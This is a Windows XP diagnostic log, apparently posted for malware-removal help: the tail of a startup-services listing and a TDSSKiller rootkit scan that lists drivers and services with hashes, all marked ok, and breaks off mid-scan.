O23 - Service: Služba Google Update (gupdate1ca9d1ab21a2990) (gupdate1ca9d1ab21a2990) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: Intel(R) Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Program Files\Intel\Intel Matrix Storage Manager\Iaantmon.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared Files\RichVideo.exe
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files\Skype\Updater\Updater.exe

--
End of file - 8753 bytes
---------------------------------------------------------------------

06:00:46.0312 3996 TDSS rootkit removing tool 2.8.8.0 Aug 24 2012 13:27:48
06:00:46.0359 3996 ============================================================
06:00:46.0359 3996 Current date / time: 2012/08/28 06:00:46.0359
06:00:46.0359 3996 SystemInfo:
06:00:46.0359 3996
06:00:46.0359 3996 OS Version: 5.1.2600 ServicePack: 3.0
06:00:46.0359 3996 Product type: Workstation
06:00:46.0359 3996 ComputerName: ACER-109CD108E4
06:00:46.0359 3996 UserName: Ester
06:00:46.0359 3996 Windows directory: C:\WINDOWS
06:00:46.0359 3996 System windows directory: C:\WINDOWS
06:00:46.0359 3996 Processor architecture: Intel x86
06:00:46.0359 3996 Number of processors: 1
06:00:46.0359 3996 Page size: 0x1000
06:00:46.0359 3996 Boot type: Normal boot
06:00:46.0359 3996 ============================================================
06:00:46.0968 3996 Drive \Device\Harddisk0\DR0 - Size: 0x12A1F16000 (74.53 Gb), SectorSize: 0x200, Cylinders: 0x2601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
06:00:46.0968 3996 ============================================================
06:00:46.0968 3996 \Device\Harddisk0\DR0:
06:00:46.0968 3996 MBR partitions:
06:00:46.0968 3996 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0xBB86BD, BlocksNum 0x4429821
06:00:46.0968 3996 \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x4FE1EDE, BlocksNum 0x452C5E3
06:00:46.0968 3996 ============================================================
06:00:47.0015 3996 C: <-> \Device\Harddisk0\DR0\Partition1
06:00:47.0031 3996 D: <-> \Device\Harddisk0\DR0\Partition2
06:00:47.0062 3996 ============================================================
06:00:47.0062 3996 Initialize success
06:00:47.0062 3996 ============================================================
06:01:37.0375 0592 ============================================================
06:01:37.0375 0592 Scan started
06:01:37.0375 0592 Mode: Manual;
06:01:37.0375 0592 ============================================================
06:01:37.0484 0592 ================ Scan system memory ========================
06:01:37.0484 0592 System memory - ok
06:01:37.0500 0592 ================ Scan services =============================
06:01:37.0671 0592 [ F11D68E40ED62FDB7C460C445F1EC4E5 ] 602XML Updater C:\Program Files\Common Files\soft602\602updsvc\602updsvc.exe
06:01:37.0671 0592 602XML Updater - ok
06:01:37.0843 0592 Abiosdsk - ok
06:01:37.0906 0592 [ 6ABB91494FE6C59089B9336452AB2EA3 ] abp480n5 C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS
06:01:37.0906 0592 abp480n5 - ok
06:01:37.0984 0592 [ 4FE34F1F3126B61FCC6B2043AA8112C9 ] ACPI C:\WINDOWS\system32\DRIVERS\ACPI.sys
06:01:37.0984 0592 ACPI - ok
06:01:38.0015 0592 [ AFDFF022A01F0B11C776F0860C3B282F ] ACPIEC C:\WINDOWS\system32\DRIVERS\ACPIEC.sys
06:01:38.0015 0592 ACPIEC - ok
06:01:38.0125 0592 [ 76D5A3D2A50402A0B9B6ED13C4371E79 ] AdobeFlashPlayerUpdateSvc C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
06:01:38.0125 0592 AdobeFlashPlayerUpdateSvc - ok
06:01:38.0203 0592 [ 9A11864873DA202C996558B2106B0BBC ] adpu160m C:\WINDOWS\system32\DRIVERS\adpu160m.sys
06:01:38.0203 0592 adpu160m - ok
06:01:38.0250 0592 [ 8BED39E3C35D6A489438B8141717A557 ] aec C:\WINDOWS\system32\drivers\aec.sys
06:01:38.0250 0592 aec - ok
06:01:38.0328 0592 [ 1E44BC1E83D8FD2305F8D452DB109CF9 ] AFD C:\WINDOWS\System32\drivers\afd.sys
06:01:38.0328 0592 AFD - ok
06:01:38.0390 0592 [ 08FD04AA961BDC77FB983F328334E3D7 ] agp440 C:\WINDOWS\system32\DRIVERS\agp440.sys
06:01:38.0390 0592 agp440 - ok
06:01:38.0437 0592 [ 03A7E0922ACFE1B07D5DB2EEB0773063 ] agpCPQ C:\WINDOWS\system32\DRIVERS\agpCPQ.sys
06:01:38.0437 0592 agpCPQ - ok
06:01:38.0468 0592 [ C23EA9B5F46C7F7910DB3EAB648FF013 ] Aha154x C:\WINDOWS\system32\DRIVERS\aha154x.sys
06:01:38.0468 0592 Aha154x - ok
06:01:38.0500 0592 [ 19DD0FB48B0C18892F70E2E7D61A1529 ] aic78u2 C:\WINDOWS\system32\DRIVERS\aic78u2.sys
06:01:38.0500 0592 aic78u2 - ok
06:01:38.0531 0592 [ B7FE594A7468AA0132DEB03FB8E34326 ] aic78xx C:\WINDOWS\system32\DRIVERS\aic78xx.sys
06:01:38.0531 0592 aic78xx - ok
06:01:38.0593 0592 [ E0A6FA244B8624D78FE5FF6F56A33BAE ] Alerter C:\WINDOWS\system32\alrsvc.dll
06:01:38.0593 0592 Alerter - ok
06:01:38.0656 0592 [ 88842DE939A827577BF24243699AC80A ] ALG C:\WINDOWS\System32\alg.exe
06:01:38.0656 0592 ALG - ok
06:01:38.0718 0592 [ 1140AB9938809700B46BB88E46D72A96 ] AliIde C:\WINDOWS\system32\DRIVERS\aliide.sys
06:01:38.0718 0592 AliIde - ok
06:01:38.0734 0592 [ CB08AED0DE2DD889A8A820CD8082D83C ] alim1541 C:\WINDOWS\system32\DRIVERS\alim1541.sys
06:01:38.0734 0592 alim1541 - ok
06:01:38.0750 0592 [ 95B4FB835E28AA1336CEEB07FD5B9398 ] amdagp C:\WINDOWS\system32\DRIVERS\amdagp.sys
06:01:38.0750 0592 amdagp - ok
06:01:38.0765 0592 [ 79F5ADD8D24BD6893F2903A3E2F3FAD6 ] amsint C:\WINDOWS\system32\DRIVERS\amsint.sys
06:01:38.0765 0592 amsint - ok
06:01:38.0843 0592 [ 0A1CC583E8147004E4AD4625D7FBF88C ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe
06:01:38.0843 0592 AntiVirSchedulerService - ok
06:01:38.0921 0592 [ C9A36EF935ACED86AEDF93E97E606911 ] AntiVirService C:\Program Files\Avira\AntiVir Desktop\avguard.exe
06:01:38.0921 0592 AntiVirService - ok
06:01:39.0000 0592 [ E38BA9FAB3981A2115C53260B930FD3C ] AntiVirWebService C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
06:01:39.0015 0592 AntiVirWebService - ok
06:01:39.0078 0592 [ 6B8E7A90E576D4FE308F97C69060A171 ] AppMgmt C:\WINDOWS\System32\appmgmts.dll
06:01:39.0078 0592 AppMgmt - ok
06:01:39.0140 0592 [ B5B8A80875C1DEDEDA8B02765642C32F ] Arp1394 C:\WINDOWS\system32\DRIVERS\arp1394.sys
06:01:39.0140 0592 Arp1394 - ok
06:01:39.0187 0592 [ 62D318E9A0C8FC9B780008E724283707 ] asc C:\WINDOWS\system32\DRIVERS\asc.sys
06:01:39.0187 0592 asc - ok
06:01:39.0234 0592 [ 69EB0CC7714B32896CCBFD5EDCBEA447 ] asc3350p C:\WINDOWS\system32\DRIVERS\asc3350p.sys
06:01:39.0234 0592 asc3350p - ok
06:01:39.0265 0592 [ 5D8DE112AA0254B907861E9E9C31D597 ] asc3550 C:\WINDOWS\system32\DRIVERS\asc3550.sys
06:01:39.0265 0592 asc3550 - ok
06:01:39.0453 0592 [ 0E5E4957549056E2BF2C49F4F6B601AD ] aspnet_state C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
06:01:39.0468 0592 aspnet_state - ok
06:01:39.0515 0592 [ B153AFFAC761E7F5FCFA822B9C4E97BC ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
06:01:39.0515 0592 AsyncMac - ok
06:01:39.0546 0592 [ 9F3A2F5AA6875C72BF062C712CFA2674 ] atapi C:\WINDOWS\system32\DRIVERS\atapi.sys
06:01:39.0562 0592 atapi - ok
06:01:39.0578 0592 Atdisk - ok
06:01:39.0625 0592 [ 9916C1225104BA14794209CFA8012159 ] Atmarpc C:\WINDOWS\system32\DRIVERS\atmarpc.sys
06:01:39.0625 0592 Atmarpc - ok
06:01:39.0687 0592 [ DE31B88962A8645DBA5A37B993E7B0F1 ] AudioSrv C:\WINDOWS\System32\audiosrv.dll
06:01:39.0687 0592 AudioSrv - ok
06:01:39.0734 0592 [ D9F724AA26C010A217C97606B160ED68 ] audstub C:\WINDOWS\system32\DRIVERS\audstub.sys
06:01:39.0734 0592 audstub - ok
06:01:39.0812 0592 [ D5541F0AFB767E85FC412FC609D96A74 ] avgntflt C:\WINDOWS\system32\DRIVERS\avgntflt.sys
06:01:39.0812 0592 avgntflt - ok
06:01:39.0875 0592 [ 7D967A682D4694DF7FA57D63A2DB01FE ] avipbb C:\WINDOWS\system32\DRIVERS\avipbb.sys
06:01:39.0875 0592 avipbb - ok
06:01:39.0937 0592 [ 53E56450DA16A1A7F0D002F511113F67 ] avkmgr C:\WINDOWS\system32\DRIVERS\avkmgr.sys
06:01:39.0937 0592 avkmgr - ok
06:01:40.0000 0592 [ F96038AA1EC4013A93D2420FC689D1E9 ] b57w2k C:\WINDOWS\system32\DRIVERS\b57xp32.sys
06:01:40.0015 0592 b57w2k - ok
06:01:40.0109 0592 [ B89BCF0A25AEB3B47030AC83287F894A ] BCM43XX C:\WINDOWS\system32\DRIVERS\bcmwl5.sys
06:01:40.0125 0592 BCM43XX - ok
06:01:40.0171 0592 [ DA1F27D85E0D1525F6621372E7B685E9 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
06:01:40.0171 0592 Beep - ok
06:01:40.0234 0592 [ 19395D092FD85DDC2D9C7729CF5A2AC8 ] BITS C:\WINDOWS\system32\qmgr.dll
06:01:40.0281 0592 BITS - ok
06:01:40.0328 0592 [ 89E739BBA5F636297EA5B5F811189E06 ] Browser C:\WINDOWS\System32\browser.dll
06:01:40.0343 0592 Browser - ok
06:01:40.0406 0592 [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf C:\WINDOWS\system32\DRIVERS\cbidf2k.sys
06:01:40.0406 0592 cbidf - ok
06:01:40.0437 0592 [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf2k C:\WINDOWS\system32\drivers\cbidf2k.sys
06:01:40.0437 0592 cbidf2k - ok
06:01:40.0468 0592 [ 0BE5AEF125BE881C4F854C554F2B025C ] CCDECODE C:\WINDOWS\system32\DRIVERS\CCDECODE.sys
06:01:40.0468 0592 CCDECODE - ok
06:01:40.0531 0592 [ F3EC03299634490E97BBCE94CD2954C7 ] cd20xrnt C:\WINDOWS\system32\DRIVERS\cd20xrnt.sys
06:01:40.0531 0592 cd20xrnt - ok
06:01:40.0562 0592 [ C1B486A7658353D33A10CC15211A873B ] Cdaudio C:\WINDOWS\system32\drivers\Cdaudio.sys
06:01:40.0562 0592 Cdaudio - ok
06:01:40.0625 0592 [ C885B02847F5D2FD45A24E219ED93B32 ] Cdfs C:\WINDOWS\system32\drivers\Cdfs.sys
06:01:40.0625 0592 Cdfs - ok
06:01:40.0671 0592 [ 1F4260CC5B42272D71F79E570A27A4FE ] Cdrom C:\WINDOWS\system32\DRIVERS\cdrom.sys
06:01:40.0687 0592 Cdrom - ok
06:01:40.0703 0592 Changer - ok
06:01:40.0765 0592 [ E390DC1D7C461D7D56EC53402F329928 ] CiSvc C:\WINDOWS\system32\cisvc.exe
06:01:40.0765 0592 CiSvc - ok
06:01:40.0796 0592 [ 064507A8DFA8C5C7E2FFDDD3E6F424FA ] ClipSrv C:\WINDOWS\system32\clipsrv.exe
06:01:40.0812 0592 ClipSrv - ok
06:01:40.0875 0592 [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
06:01:40.0984 0592 clr_optimization_v2.0.50727_32 - ok
06:01:41.0031 0592 [ 0F6C187D38D98F8DF904589A5F94D411 ] CmBatt C:\WINDOWS\system32\DRIVERS\CmBatt.sys
06:01:41.0031 0592 CmBatt - ok
06:01:41.0093 0592 [ 964D0F042ACA51D5644779EB9D9EE40F ] CmdIde C:\WINDOWS\system32\DRIVERS\cmdide.sys
06:01:41.0093 0592 CmdIde - ok
06:01:41.0140 0592 [ 6E4C9F21F0FAE8940661144F41B13203 ] Compbatt C:\WINDOWS\system32\DRIVERS\compbatt.sys
06:01:41.0140 0592 Compbatt - ok
06:01:41.0171 0592 COMSysApp - ok
06:01:41.0218 0592 [ 3EE529119EED34CD212A215E8C40D4B6 ] Cpqarray C:\WINDOWS\system32\DRIVERS\cpqarray.sys
06:01:41.0218 0592 Cpqarray - ok
06:01:41.0265 0592 [ C2EB4539A4F6AB6EDD01BDC191619975 ] cpuz135 C:\WINDOWS\system32\drivers\cpuz135_x32.sys
06:01:41.0281 0592 cpuz135 - ok
06:01:41.0328 0592 [ F3AB0933CBD166D271992F411C27CCAF ] CryptSvc C:\WINDOWS\System32\cryptsvc.dll
06:01:41.0328 0592 CryptSvc - ok
06:01:41.0375 0592 [ E550E7418984B65A78299D248F0A7F36 ] dac2w2k C:\WINDOWS\system32\DRIVERS\dac2w2k.sys
06:01:41.0375 0592 dac2w2k - ok
06:01:41.0390 0592 [ 683789CAA3864EB46125AE86FF677D34 ] dac960nt C:\WINDOWS\system32\DRIVERS\dac960nt.sys
06:01:41.0390 0592 dac960nt - ok
06:01:41.0453 0592 [ BE27674D1CBC3214AEC84B4336A38BBF ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
06:01:41.0468 0592 DcomLaunch - ok
06:01:41.0515 0592 [ 8C9A53E285AC5E6704844D0459EC85BE ] Dhcp C:\WINDOWS\System32\dhcpcsvc.dll
06:01:41.0515 0592 Dhcp - ok
06:01:41.0546 0592 [ 044452051F3E02E7963599FC8F4F3E25 ] Disk C:\WINDOWS\system32\DRIVERS\disk.sys
06:01:41.0546 0592 Disk - ok
06:01:41.0609 0592 [ 060DB81DFB79C8244EB65D10B6C7873F ] DKbFltr C:\WINDOWS\system32\DRIVERS\DKbFltr.sys
06:01:41.0609 0592 DKbFltr - ok
06:01:41.0625 0592 dmadmin - ok
06:01:41.0703 0592 [ DB5FD2BF5B07DC54BFCB3664FF05BD7C ] dmboot C:\WINDOWS\system32\drivers\dmboot.sys
06:01:41.0718 0592 dmboot - ok
06:01:41.0765 0592 [ FFF1720AF51171F32F1EAD5CF71F2810 ] dmio C:\WINDOWS\system32\drivers\dmio.sys
06:01:41.0765 0592 dmio - ok
06:01:41.0828 0592 [ E9317282A63CA4D188C0DF5E09C6AC5F ] dmload C:\WINDOWS\system32\drivers\dmload.sys
06:01:41.0843 0592 dmload - ok
06:01:41.0890 0592 [ 2BFEFE9E865655A76982F050450B9591 ] dmserver C:\WINDOWS\System32\dmserver.dll
06:01:41.0906 0592 dmserver - ok
06:01:41.0937 0592 [ 8A208DFCF89792A484E76C40E5F50B45 ] DMusic C:\WINDOWS\system32\drivers\DMusic.sys
06:01:41.0937 0592 DMusic - ok
06:01:41.0968 0592 [ DFAA406BF19F4EE806A6F8D4342137F7 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
06:01:41.0968 0592 Dnscache - ok
06:01:42.0046 0592 [ 4A3E2BD20157A0946751229E92EB8621 ] Dot3svc C:\WINDOWS\System32\dot3svc.dll
06:01:42.0046 0592 Dot3svc - ok
06:01:42.0062 0592 [ 40F3B93B4E5B0126F2F5C0A7A5E22660 ] dpti2o C:\WINDOWS\system32\DRIVERS\dpti2o.sys
06:01:42.0062 0592 dpti2o - ok
06:01:42.0109 0592 [ 8F5FCFF8E8848AFAC920905FBD9D33C8 ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
06:01:42.0109 0592 drmkaud - ok
06:01:42.0156 0592 [ 651554E483712B708EDE864D0CA1AA73 ] DrvAgent32 C:\WINDOWS\system32\Drivers\DrvAgent32.sys
06:01:42.0156 0592 DrvAgent32 - ok
06:01:42.0187 0592 dwshd - ok
06:01:42.0234 0592 [ 0887D9C2BE8D940778CAD1E3B85F2A41 ] EapHost C:\WINDOWS\System32\eapsvc.dll
06:01:42.0234 0592 EapHost - ok
06:01:42.0296 0592 [ A2A4912798F2BE706ABADD3D30800D16 ] ERSvc C:\WINDOWS\System32\ersvc.dll
06:01:42.0296 0592 ERSvc - ok
06:01:42.0343 0592 [ 9EF697AF07BB8DD82C3B02CA953A95B7 ] Eventlog C:\WINDOWS\system32\services.exe
06:01:42.0375 0592 Eventlog - ok
06:01:42.0421 0592 [ A371F11EF07653591C8DE26AFB13CE7F ] EventSystem C:\WINDOWS\system32\es.dll
06:01:42.0437 0592 EventSystem - ok
06:01:42.0468 0592 [ 38D332A6D56AF32635675F132548343E ] Fastfat C:\WINDOWS\system32\drivers\Fastfat.sys
06:01:42.0484 0592 Fastfat - ok
06:01:42.0546 0592 [ EE9A2B9EA968A792A053C9D1A86BF870 ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
06:01:42.0546 0592 FastUserSwitchingCompatibility - ok
06:01:42.0593 0592 [ 2CD14C70D1D81AF054AA5ED8024DCAE6 ] Fax C:\WINDOWS\system32\fxssvc.exe
06:01:42.0593 0592 Fax - ok
06:01:42.0640 0592 [ 92CDD60B6730B9F50F6A1A0C1F8CDC81 ] Fdc C:\WINDOWS\system32\drivers\Fdc.sys
06:01:42.0640 0592 Fdc - ok
06:01:42.0687 0592 [ E9648254056BCE81A85380C0C3647DC4 ] FETNDIS C:\WINDOWS\system32\DRIVERS\fetnd5.sys
06:01:42.0687 0592 FETNDIS - ok
06:01:42.0750 0592 [ AC366695A0796560AA37215AD5762AAF ] Fips C:\WINDOWS\system32\drivers\Fips.sys
06:01:42.0750 0592 Fips - ok
06:01:42.0796 0592 [ 9D27E7B80BFCDF1CDD9B555862D5E7F0 ] Flpydisk C:\WINDOWS\system32\drivers\Flpydisk.sys
06:01:42.0796 0592 Flpydisk - ok
06:01:42.0859 0592 [ B2CF4B0786F8212CB92ED2B50C6DB6B0 ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
06:01:42.0875 0592 FltMgr - ok
06:01:42.0968 0592 [ 8BA7C024070F2B7FDD98ED8A4BA41789 ] FontCache3.0.0.0 c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
06:01:42.0968 0592 FontCache3.0.0.0 - ok
06:01:43.0015 0592 [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
06:01:43.0015 0592 Fs_Rec - ok
06:01:43.0046 0592 [ 4E664D8541DB4A66B73A24257E322E1F ] Ftdisk C:\WINDOWS\system32\DRIVERS\ftdisk.sys
06:01:43.0046 0592 Ftdisk - ok
06:01:43.0093 0592 [ 3A74C423CF6BCCA6982715878F450A3B ] gagp30kx C:\WINDOWS\system32\DRIVERS\gagp30kx.sys
06:01:43.0093 0592 gagp30kx - ok
06:01:43.0125 0592 [ 0A02C63C8B144BD8C86B103DEE7C86A2 ] Gpc C:\WINDOWS\system32\DRIVERS\msgpc.sys
06:01:43.0125 0592 Gpc - ok
06:01:43.0250 0592 [ 626A24ED1228580B9518C01930936DF9 ] gupdate1ca9d1ab21a2990 C:\Program Files\Google\Update\GoogleUpdate.exe
06:01:43.0250 0592 gupdate1ca9d1ab21a2990 - ok
06:01:43.0281 0592 [ 626A24ED1228580B9518C01930936DF9 ] gupdatem C:\Program Files\Google\Update\GoogleUpdate.exe
06:01:43.0281 0592 gupdatem - ok
06:01:43.0359 0592 [ 5D4BC124FAAE6730AC002CDB67BF1A1C ] gusvc C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
06:01:43.0359 0592 gusvc - ok
06:01:43.0406 0592 [ 573C7D0A32852B48F3058CFD8026F511 ] HDAudBus C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
06:01:43.0406 0592 HDAudBus - ok
06:01:43.0484 0592 [ FCFE31FB75F8A6295B6B0AF87A626282 ] helpsvc C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
06:01:43.0484 0592 helpsvc - ok
06:01:43.0562 0592 [ CCF82C5EC8A7326C3066DE870C06DAF1 ] HidUsb C:\WINDOWS\system32\DRIVERS\hidusb.sys
06:01:43.0562 0592 HidUsb - ok
06:01:43.0625 0592 [ 7A6B320928F86BC851530D63C82965D9 ] hkmsvc C:\WINDOWS\System32\kmsvc.dll
06:01:43.0640 0592 hkmsvc - ok
06:01:43.0687 0592 [ B028377DEA0546A5FCFBA928A8AEFAE0 ] hpn C:\WINDOWS\system32\DRIVERS\hpn.sys
06:01:43.0687 0592 hpn - ok
06:01:43.0765 0592 [ 6A5C4732D6803F84E2987EDD8E4359CE ] HSFHWAZL C:\WINDOWS\system32\DRIVERS\HSFHWAZL.sys
06:01:43.0765 0592 HSFHWAZL - ok
06:01:43.0828 0592 [ 21C31273C6CC4826E74BE8AE3B09D4A8 ] HSF_DPV C:\WINDOWS\system32\DRIVERS\HSF_DPV.sys
06:01:43.0843 0592 HSF_DPV - ok
06:01:43.0906 0592 [ F80A415EF82CD06FFAF0D971528EAD38 ] HTTP C:\WINDOWS\system32\Drivers\HTTP.sys
06:01:43.0906 0592 HTTP - ok
06:01:43.0984 0592 [ 58FE2F2DA3BC5573F4A35B3760D3125F ] HTTPFilter C:\WINDOWS\System32\w3ssl.dll
06:01:43.0984 0592 HTTPFilter - ok
06:01:44.0015 0592 [ 9368670BD426EBEA5E8B18A62416EC28 ] i2omgmt C:\WINDOWS\system32\drivers\i2omgmt.sys
06:01:44.0015 0592 i2omgmt - ok
06:01:44.0046 0592 [ F10863BF1CCC290BABD1A09188AE49E0 ] i2omp C:\WINDOWS\system32\DRIVERS\i2omp.sys
06:01:44.0062 0592 i2omp - ok
06:01:44.0093 0592 [ C528E27945367191E7BAE364930B6932 ] i8042prt C:\WINDOWS\system32\DRIVERS\i8042prt.sys
06:01:44.0093 0592 i8042prt - ok
06:01:44.0187 0592 [ AE38A12F79A4980DDB88F36514F8A1DA ] IAANTMON C:\Program Files\Intel\Intel Matrix Storage Manager\Iaantmon.exe
06:01:44.0203 0592 IAANTMON - ok
06:01:44.0437 0592 [ 12C7F8D581C4A9F126F5F8F5683A1C29 ] ialm C:\WINDOWS\system32\DRIVERS\igxpmp32.sys
06:01:44.0625 0592 ialm - ok
06:01:44.0687 0592 [ 997E8F5939F2D12CD9F2E6B395724C16 ] iaStor C:\WINDOWS\system32\DRIVERS\iaStor.sys
06:01:44.0687 0592 iaStor - ok
06:01:44.0750 0592 [ DAF66902F08796F9C694901660E5A64A ] IDriverT C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
06:01:44.0750 0592 IDriverT - ok
06:01:44.0906 0592 [ C01AC32DC5C03076CFB852CB5DA5229C ] idsvc c:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
06:01:44.0921 0592 idsvc - ok
06:01:44.0984 0592 [ 083A052659F5310DD8B6A6CB05EDCF8E ] Imapi C:\WINDOWS\system32\DRIVERS\imapi.sys
06:01:44.0984 0592 Imapi - ok
06:01:45.0093 0592 [ F7B93AAFAD33B2320954C17E26C8D361 ] ImapiService C:\WINDOWS\system32\imapi.exe
06:01:45.0093 0592 ImapiService - ok
06:01:45.0171 0592 [ 4A40E045FAEE58631FD8D91AFC620719 ] ini910u C:\WINDOWS\system32\DRIVERS\ini910u.sys
06:01:45.0187 0592 ini910u - ok
06:01:45.0265 0592 [ F8F75594C17FE7BCE1B4045BB7199868 ] int15 C:\WINDOWS\system32\drivers\int15.sys
06:01:45.0265 0592 int15 - ok
06:01:45.0359 0592 [ 4D8D5B1C895EA0F2A721B98A7CE198F1 ] int15.sys C:\Acer\Empowering Technology\eRecovery\int15.sys
06:01:45.0375 0592 int15.sys - ok
06:01:45.0578 0592 [ B45A576AD280DD4F605F58B24CDAAFE1 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
06:01:45.0609 0592 IntcAzAudAddService - ok
06:01:45.0671 0592 [ 57D928E548B38502ABBA7A77A6EB7312 ] IntelIde C:\WINDOWS\system32\DRIVERS\intelide.sys
06:01:45.0671 0592 IntelIde - ok
06:01:45.0703 0592 [ 27B290D632AF2CF3CF40BFDDB7370985 ] intelppm C:\WINDOWS\system32\DRIVERS\intelppm.sys
06:01:45.0703 0592 intelppm - ok
06:01:45.0750 0592 [ 3BB22519A194418D5FEC05D800A19AD0 ] Ip6Fw C:\WINDOWS\system32\drivers\ip6fw.sys
06:01:45.0750 0592 Ip6Fw - ok
06:01:45.0796 0592 [ 731F22BA402EE4B62748ADAF6363C182 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
06:01:45.0812 0592 IpFilterDriver - ok
06:01:45.0875 0592 [ B87AB476DCF76E72010632B5550955F5 ] IpInIp C:\WINDOWS\system32\DRIVERS\ipinip.sys
06:01:45.0875 0592 IpInIp - ok
06:01:45.0921 0592 [ CC748EA12C6EFFDE940EE98098BF96BB ] IpNat C:\WINDOWS\system32\DRIVERS\ipnat.sys
06:01:45.0921 0592 IpNat - ok
06:01:45.0984 0592 [ 23C74D75E36E7158768DD63D92789A91 ] IPSec C:\WINDOWS\system32\DRIVERS\ipsec.sys
06:01:45.0984 0592 IPSec - ok
06:01:46.0031 0592 [ ACA5E7B54409F9CB5EED97ED0C81120E ] irda C:\WINDOWS\system32\DRIVERS\irda.sys
06:01:46.0031 0592 irda - ok
06:01:46.0078 0592 [ C93C9FF7B04D772627A3646D89F7BF89 ] IRENUM C:\WINDOWS\system32\DRIVERS\irenum.sys
06:01:46.0078 0592 IRENUM - ok
06:01:46.0156 0592 [ 8024EA8C5B2D2A4D201F418B0AADB804 ] Irmon C:\WINDOWS\System32\irmon.dll
06:01:46.0156 0592 Irmon - ok
06:01:46.0203 0592 [ CC9F8A2D60AED1A51A3AC34C59B987AE ] isapnp C:\WINDOWS\system32\DRIVERS\isapnp.sys
06:01:46.0203 0592 isapnp - ok
06:01:46.0328 0592 [ 28E8A9984BA1297EFE44B6138D2CA51E ] JavaQuickStarterService C:\Program Files\Java\jre6\bin\jqs.exe
06:01:46.0343 0592 JavaQuickStarterService - ok
06:01:46.0390 0592 [ 1B6162FE7F66B1A71A4B70F941C4AA9B ] Kbdclass C:\WINDOWS\system32\DRIVERS\kbdclass.sys
06:01:46.0390 0592 Kbdclass - ok
06:01:46.0421 0592 [ 86C8F23616C6C6E5B2776901C17B945B ] kbdhid C:\WINDOWS\system32\DRIVERS\kbdhid.sys
06:01:46.0421 0592 kbdhid - ok
06:01:46.0453 0592 [ 692BCF44383D056AED41B045A323D378 ] kmixer C:\WINDOWS\system32\drivers\kmixer.sys
06:01:46.0453 0592 kmixer - ok
06:01:46.0515 0592 [ B467646C54CC746128904E1654C750C1 ] KSecDD C:\WINDOWS\system32\drivers\KSecDD.sys
06:01:46.0515 0592 KSecDD - ok
06:01:46.0578 0592 [ 3428E8F86F8ADD36B42FB23542C7B3E4 ] lanmanserver C:\WINDOWS\System32\srvsvc.dll
06:01:46.0578 0592 lanmanserver - ok
06:01:46.0640 0592 [ 936C1D110232D23B621CB0196E4F80F0 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
06:01:46.0656 0592 lanmanworkstation - ok
06:01:46.0671 0592 lbrtfdc - ok
06:01:46.0765 0592 [ 793FF718477345CD5D232C50BED1E452 ] LightScribeService C:\Program Files\Common Files\LightScribe\LSSrvc.exe
06:01:46.0765 0592 LightScribeService - ok
06:01:46.0843 0592 [ 0AB159F536E3E8F7F07113702A07CCA5 ] LmHosts C:\WINDOWS\System32\lmhsvc.dll
06:01:46.0843 0592 LmHosts - ok
06:01:46.0890 0592 [ 0CEA2D0D3FA284B85ED5B68365114F76 ] mdmxsdk C:\WINDOWS\system32\DRIVERS\mdmxsdk.sys
06:01:46.0890 0592 mdmxsdk - ok
06:01:46.0937 0592 [ 221CD1C815B8A6B79389C3F5D1018DE8 ] Messenger C:\WINDOWS\System32\msgsvc.dll
06:01:46.0937 0592 Messenger - ok
06:01:47.0000 0592 [ 4AE068242760A1FB6E1A44BF4E16AFA6 ] mnmdd C:\WINDOWS\system32\drivers\mnmdd.sys
06:01:47.0000 0592 mnmdd - ok
06:01:47.0062 0592 [ 9A57D046F88F4B69751B11FD40088A61 ] mnmsrvc C:\WINDOWS\system32\mnmsrvc.exe
06:01:47.0078 0592 mnmsrvc - ok
06:01:47.0109 0592 [ 44032B0C6D9954D3FD26438330B99EE7 ] Modem C:\WINDOWS\system32\drivers\Modem.sys
